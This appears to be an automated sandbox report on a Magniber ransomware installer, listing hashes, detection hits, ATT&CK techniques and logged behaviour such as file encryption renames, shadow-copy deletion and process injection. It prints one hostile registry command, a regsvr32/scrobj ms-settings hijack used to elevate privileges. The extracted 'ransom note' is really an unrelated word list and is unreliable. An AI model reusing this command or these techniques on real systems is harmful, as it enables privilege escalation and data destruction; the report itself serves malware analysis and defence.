magniber | b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
14-09-2022 23:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ddf798fa09f7c72f9fec4478841990d7.msi
Size

92KB
MD5

ddf798fa09f7c72f9fec4478841990d7
SHA1

42b8bc580bd77c330432fb7cf6d9b8c8212961bd
SHA256

b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a
SHA512

fa39bd42f000e8dffb4638a65cb08ab0f4393a7ed8ef718efa7f3652c00cd1aa31c6f3fb5365674700a08eb066d3e514e7f8131fce0bccd9b5897ea96c9b2425
SSDEEP

768:8lUJ5BxTORGx4/dpZ6G+jzI/RyGwaW27N5MSdm4cyWMDC/yWMDCmYinj:hxTcdpZ6G//RzwaN1d00DU0D37n

Score

10^/10

magniber persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\3064_104092216\us_tv_and_film.txt

Ransom Note

you i to that it me what this know i'm no have my don't just not do be your we it's so but all well oh about right you're get here out going like yeah if can up want think that's now go him how got did why see come good really look will okay back can't mean tell i'll hey he's could didn't yes something because say take way little make need gonna never we're too she's i've sure our sorry what's let thing maybe down man very there's should anything said much any even off please doing thank give thought help talk god still wait find nothing again things let's doesn't call told great better ever night away believe feel everything you've fine last keep does put around stop they're i'd guy isn't always listen wanted guys huh those big lot happened thanks won't trying kind wrong talking guess care bad mom remember getting we'll together dad leave understand wouldn't actually hear baby nice father else stay done wasn't course might mind every enough try hell came someone you'll whole yourself idea ask must coming looking woman room knew tonight real son hope went hmm happy pretty saw girl sir friend already saying next job problem minute thinking haven't heard honey matter myself couldn't exactly having probably happen we've hurt boy dead gotta alone excuse start kill hard you'd today car ready without wants hold wanna yet seen deal once gone morning supposed friends head stuff worry live truth face forget true cause soon knows telling wife who's chance run move anyone person bye somebody heart miss making meet anyway phone reason damn lost looks bring case turn wish tomorrow kids trust check change anymore least aren't working makes taking means brother hate ago says beautiful gave fact crazy sit afraid important rest fun kid word watch glad everyone sister minutes everybody bit couple whoa either mrs feeling daughter wow gets asked break promise door close hand easy question tried far walk needs mine killed hospital anybody alright wedding shut able die perfect stand comes hit waiting dinner funny husband almost pay answer cool eyes news child shouldn't yours moment sleep read where's sounds sonny pick sometimes bed date plan hours lose hands serious shit behind inside ahead week wonderful fight past cut quite he'll sick it'll eat nobody goes save seems finally lives worried upset carly met brought seem sort safe weren't leaving front shot loved asking running clear figure hot felt parents drink absolutely how's daddy sweet alive sense meant happens bet blood ain't kidding lie meeting dear seeing sound fault ten buy hour speak lady jen thinks christmas outside hang possible worse mistake ooh handle spend totally giving here's marriage realize unless sex send needed scared picture talked ass hundred changed completely explain certainly sign boys relationship loves hair lying choice anywhere future weird luck she'll turned touch kiss crane questions obviously wonder pain calling somewhere throw straight cold fast words food none drive feelings they'll marry drop cannot dream protect twenty surprise sweetheart poor looked mad except gun y'know dance takes appreciate especially situation besides pull hasn't worth sheridan amazing expect swear piece busy happening movie we'd catch perhaps step fall watching kept darling dog honor moving till admit problems murder he'd evil definitely feels honest eye broke missed longer dollars tired evening starting entire trip niles suppose calm imagine fair caught blame sitting favor apartment terrible clean learn frasier relax accident wake prove smart message missing forgot interested table nbsp mouth pregnant ring careful shall dude ride figured wear shoot stick follow angry write stopped ran standing forgive jail wearing ladies kinda lunch cristian greenlee gotten hoping phoebe thousand ridge paper tough tape count boyfriend proud agree birthday they've share offer hurry feet wondering decision ones finish voice herself would've mess deserve evidence cute dress interesting hotel enjoy quiet concerned staying beat sweetie mention clothes fell neither mmm fix respect prison attention holding calls surprised bar keeping gift hadn't putting dark owe ice helping normal aunt lawyer apart plans jax girlfriend floor whether everything's box judge upstairs sake mommy possibly worst acting accept blow strange saved conversation plane mama yesterday lied quick lately stuck difference store she'd bought doubt listening walking cops deep dangerous buffy sleeping chloe rafe join card crime gentlemen willing window walked guilty likes fighting difficult soul joke favorite uncle promised bother seriously cell knowing broken advice somehow paid losing push helped killing boss liked innocent rules learned thirty risk letting speaking ridiculous afternoon apologize nervous charge patient boat how'd hide detective planning huge breakfast horrible awful pleasure driving hanging picked sell quit apparently dying notice congratulations visit could've c'mon letter decide forward fool showed smell seemed spell memory pictures slow seconds hungry hearing kitchen ma'am should've realized kick grab discuss fifty reading idiot suddenly agent destroy bucks shoes peace arms demon livvie consider papers incredible witch drunk attorney tells knock ways gives nose skye turns keeps jealous drug sooner cares plenty extra outta weekend matters gosh opportunity impossible waste pretend jump eating proof slept arrest breathe perfectly warm pulled twice easier goin dating suit romantic drugs comfortable finds checked divorce begin ourselves closer ruin smile laugh treat fear what'd otherwise excited mail hiding stole pacey noticed fired excellent bringing bottom note sudden bathroom honestly sing foot remind charges witness finding tree dare hardly that'll steal silly contact teach shop plus colonel fresh trial invited roll reach dirty choose emergency dropped butt credit obvious locked loving nuts agreed prue goodbye condition guard fuckin grow cake mood crap crying belong partner trick pressure dressed taste neck nurse raise lots carry whoever drinking they'd breaking file lock wine spot paying assume asleep turning viki bedroom shower nikolas camera fill reasons forty bigger nope breath doctors pants freak movies folks cream wild truly desk convince client threw hurts spending answers shirt chair rough doin sees ought empty wind aware dealing pack tight hurting guest arrested salem confused surgery expecting deacon unfortunately goddamn bottle beyond whenever pool opinion starts jerk secrets falling necessary barely dancing tests copy cousin ahem twelve tess skin fifteen speech orders complicated nowhere escape biggest restaurant grateful usual burn address someplace screw everywhere regret goodness mistakes details responsibility suspect corner hero dumb terrific whoo hole memories o'clock teeth ruined bite stenbeck liar showing cards desperate search pathetic spoke scare marah afford settle stayed checking hired heads concern blew alcazar champagne connection tickets happiness saving kissing hated personally suggest prepared onto downstairs ticket it'd loose holy duty convinced throwing kissed legs loud saturday babies where'd warning miracle carrying blind ugly shopping hates sight bride coat clearly celebrate brilliant wanting forrester lips custody screwed buying toast thoughts reality lexie attitude advantage grandfather sami grandma someday roof marrying powerful grown grandmother fake must've ideas exciting familiar bomb bout harmony schedule capable practically correct clue forgotten appointment deserves threat bloody lonely shame jacket hook scary investigation invite shooting lesson criminal victim funeral considering burning strength harder sisters pushed shock pushing heat chocolate miserable corinthos nightmare brings zander crash chances sending recognize healthy boring feed engaged headed treated knife drag badly hire paint pardon behavior closet warn gorgeous milk survive ends dump rent remembered thanksgiving rain revenge prefer spare pray disappeared aside statement sometime meat fantastic breathing laughing stood affair ours depends protecting jury brave fingers murdered explanation picking blah stronger handsome unbelievable anytime shake oakdale wherever pulling facts waited lousy circumstances disappointed weak trusted license nothin trash understanding slip sounded awake friendship stomach weapon threatened mystery vegas understood basically switch frankly cheap lifetime deny clock garbage why'd tear ears indeed changing singing tiny decent avoid messed filled touched disappear exact pills kicked harm fortune pretending insurance fancy drove cared belongs nights lorelai lift timing guarantee chest woke burned watched heading selfish drinks doll committed elevator freeze noise wasting ceremony uncomfortable staring files bike stress permission thrown possibility borrow fabulous doors screaming bone xander what're meal apology anger honeymoon bail parking fixed wash stolen sensitive stealing photo chose lets comfort worrying pocket mateo bleeding shoulder ignore talent tied garage dies demons dumped witches rude crack bothering radar soft meantime gimme kinds fate concentrate throat prom messages intend ashamed somethin manage guilt interrupt guts tongue shoe basement sentence purse glasses cabin universe repeat mirror wound travers tall engagement therapy emotional jeez decisions soup thrilled stake chef moves extremely moments expensive counting shots kidnapped cleaning shift plate impressed smells trapped aidan knocked charming attractive argue puts whip embarrassed package hitting bust stairs alarm pure nail nerve incredibly walks dirt stamp terribly friendly damned jobs suffering disgusting stopping deliver riding helps disaster bars crossed trap talks eggs chick threatening spoken introduce confession embarrassing bags impression gate reputation presents chat suffer argument talkin crowd homework coincidence cancel pride solve hopefully pounds pine mate illegal generous outfit maid bath punch freaked begging recall enjoying prepare wheel defend signs painful yourselves maris that'd suspicious cooking button warned sixty pity yelling awhile confidence offering pleased panic hers gettin refuse grandpa testify choices cruel mental gentleman coma cutting proteus guests expert benefit faces jumped toilet sneak halloween privacy smoking reminds twins swing solid options commitment crush ambulance wallet gang eleven option laundry assure stays skip fail discussion clinic betrayed sticking bored mansion soda sheriff suite handled busted load happier studying romance procedure commit assignment suicide minds swim yell llanview chasing proper believes humor hopes lawyers giant latest escaped parent tricks insist dropping cheer medication flesh routine sandwich handed false beating warrant awfully odds treating thin suggesting fever sweat silent clever sweater mall sharing assuming judgment goodnight divorced surely steps confess math listened comin answered vulnerable bless dreaming chip zero pissed nate kills tears knees chill brains unusual packed dreamed cure lookin grave cheating breaks locker gifts awkward thursday joking reasonable dozen curse quartermaine millions dessert rolling detail alien delicious closing vampires wore tail secure salad murderer spit offense dust conscience bread answering lame invitation grief smiling pregnancy prisoner delivery guards virus shrink freezing wreck massimo wire technically blown anxious cave holidays cleared wishes caring candles bound charm pulse jumping jokes boom occasion silence nonsense frightened slipped dimera blowing relationships kidnapping spin tool roxy packing blaming wrap obsessed fruit torture personality there'll fairy necessarily seventy print motel underwear grams exhausted believing freaking carefully trace touching messing recovery intention consequences belt sacrifice courage enjoyed attracted remove testimony intense heal defending unfair relieved loyal slowly buzz alcohol surprises psychiatrist plain attic who'd uniform terrified cleaned zach threaten fella enemies satisfied imagination hooked headache forgetting counselor andie acted badge naturally frozen sakes appropriate trunk dunno costume sixteen impressive kicking junk grabbed understands describe clients owns affect witnesses starving instincts happily discussing deserved strangers surveillance admire questioning dragged barn deeply wrapped wasted tense hoped fellas roommate mortal fascinating stops arrangements agenda literally propose honesty underneath sauce promises lecture eighty torn shocked backup differently ninety deck biological pheebs ease creep waitress telephone ripped raising scratch rings prints thee arguing ephram asks oops diner annoying taggert sergeant blast towel clown habit creature bermuda snap react paranoid handling eaten therapist comment sink reporter nurses beats priority interrupting warehouse loyalty inspector pleasant excuses threats guessing tend praying motive unconscious mysterious unhappy tone switched rappaport sookie neighbor loaded swore piss balance toss misery thief squeeze lobby goa'uld geez exercise forth booked sandburg poker eighteen d'you bury everyday digging creepy wondered liver hmmm magical fits discussed moral helpful searching flew depressed aisle cris amen vows neighbors darn cents arrange annulment useless adventure resist fourteen celebrating inch debt violent sand teal'c celebration reminded phones paperwork emotions stubborn pound tension stroke steady overnight chips beef suits boxes cassadine collect tragedy spoil realm wipe surgeon stretch stepped nephew neat limo confident perspective climb punishment finest springfield hint furniture blanket twist proceed fries worries niece gloves soap signature disappoint crawl convicted flip counsel doubts crimes accusing shaking remembering hallway halfway bothered madam gather cameras blackmail symptoms rope ordinary imagined cigarette supportive explosion trauma ouch furious cheat avoiding whew thick oooh boarding approve urgent shhh misunderstanding drawer phony interfere catching bargain tragic respond punish penthouse thou rach ohhh insult bugs beside begged absolute strictly socks senses sneaking reward polite checks tale physically instructions fooled blows tabby bitter adorable y'all tested suggestion jewelry alike jacks distracted s

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral2/memory/1928-148-0x000001ADDF6E0000-0x000001ADDF6EC000-memory.dmp	family_magniber
behavioral2/memory/2408-149-0x000001D172BC0000-0x000001D172BC3000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	4888	msiexec.exe
9	4888	msiexec.exe
11	4888	msiexec.exe

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\SendSync.tiff => C:\Users\Admin\Pictures\SendSync.tiff.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\LockBackup.raw => C:\Users\Admin\Pictures\LockBackup.raw.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\GroupResolve.png => C:\Users\Admin\Pictures\GroupResolve.png.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\HideApprove.png => C:\Users\Admin\Pictures\HideApprove.png.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\LockInitialize.png => C:\Users\Admin\Pictures\LockInitialize.png.vpkrzajx	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\SendSync.tiff	MsiExec.exe

Loads dropped DLL 1 IoCs

pid	Process
1928	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1928 set thread context of 2408	1928	MsiExec.exe	55
PID 1928 set thread context of 2448	1928	MsiExec.exe	54
PID 1928 set thread context of 2744	1928	MsiExec.exe	35

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d7749718-9762-451c-9113-9b7e51bca10e.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220915011550.pma	setup.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e56d69e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e56d69e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID7E6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDCC9.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{0311111A-8CE9-4820-9F74-1D1FFF54BBAB}	msiexec.exe
File created	C:\Windows\Installer\e56d6a0.msi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000789d96067ff55f5b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000789d96060000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900789d9606000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
5672	vssadmin.exe
5708	vssadmin.exe
5740	vssadmin.exe
2984	vssadmin.exe
3240	vssadmin.exe
4280	vssadmin.exe

Modifies registry class 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1952	msiexec.exe
1952	msiexec.exe
1928	MsiExec.exe
1928	MsiExec.exe
4260	msedge.exe
4260	msedge.exe
3064	msedge.exe
3064	msedge.exe
3560	identity_helper.exe
3560	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1928	MsiExec.exe
1928	MsiExec.exe
1928	MsiExec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4888	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4888	msiexec.exe
Token: SeSecurityPrivilege	1952	msiexec.exe
Token: SeCreateTokenPrivilege	4888	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4888	msiexec.exe
Token: SeLockMemoryPrivilege	4888	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4888	msiexec.exe
Token: SeMachineAccountPrivilege	4888	msiexec.exe
Token: SeTcbPrivilege	4888	msiexec.exe
Token: SeSecurityPrivilege	4888	msiexec.exe
Token: SeTakeOwnershipPrivilege	4888	msiexec.exe
Token: SeLoadDriverPrivilege	4888	msiexec.exe
Token: SeSystemProfilePrivilege	4888	msiexec.exe
Token: SeSystemtimePrivilege	4888	msiexec.exe
Token: SeProfSingleProcessPrivilege	4888	msiexec.exe
Token: SeIncBasePriorityPrivilege	4888	msiexec.exe
Token: SeCreatePagefilePrivilege	4888	msiexec.exe
Token: SeCreatePermanentPrivilege	4888	msiexec.exe
Token: SeBackupPrivilege	4888	msiexec.exe
Token: SeRestorePrivilege	4888	msiexec.exe
Token: SeShutdownPrivilege	4888	msiexec.exe
Token: SeDebugPrivilege	4888	msiexec.exe
Token: SeAuditPrivilege	4888	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4888	msiexec.exe
Token: SeChangeNotifyPrivilege	4888	msiexec.exe
Token: SeRemoteShutdownPrivilege	4888	msiexec.exe
Token: SeUndockPrivilege	4888	msiexec.exe
Token: SeSyncAgentPrivilege	4888	msiexec.exe
Token: SeEnableDelegationPrivilege	4888	msiexec.exe
Token: SeManageVolumePrivilege	4888	msiexec.exe
Token: SeImpersonatePrivilege	4888	msiexec.exe
Token: SeCreateGlobalPrivilege	4888	msiexec.exe
Token: SeBackupPrivilege	4960	vssvc.exe
Token: SeRestorePrivilege	4960	vssvc.exe
Token: SeAuditPrivilege	4960	vssvc.exe
Token: SeBackupPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe
Token: SeTakeOwnershipPrivilege	1952	msiexec.exe
Token: SeRestorePrivilege	1952	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
4888	msiexec.exe
4888	msiexec.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1952 wrote to memory of 4264	1952	msiexec.exe	91
PID 1952 wrote to memory of 4264	1952	msiexec.exe	91
PID 1952 wrote to memory of 1928	1952	msiexec.exe	93
PID 1952 wrote to memory of 1928	1952	msiexec.exe	93
PID 2408 wrote to memory of 2656	2408	sihost.exe	96
PID 2408 wrote to memory of 2656	2408	sihost.exe	96
PID 2448 wrote to memory of 4976	2448	svchost.exe	94
PID 2448 wrote to memory of 4976	2448	svchost.exe	94
PID 2744 wrote to memory of 1652	2744	taskhostw.exe	95
PID 2744 wrote to memory of 1652	2744	taskhostw.exe	95
PID 1928 wrote to memory of 4468	1928	MsiExec.exe	98
PID 1928 wrote to memory of 4468	1928	MsiExec.exe	98
PID 4468 wrote to memory of 3064	4468	cmd.exe	100
PID 4468 wrote to memory of 3064	4468	cmd.exe	100
PID 3064 wrote to memory of 2184	3064	msedge.exe	102
PID 3064 wrote to memory of 2184	3064	msedge.exe	102
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
PID 3064 wrote to memory of 528	3064	msedge.exe	105
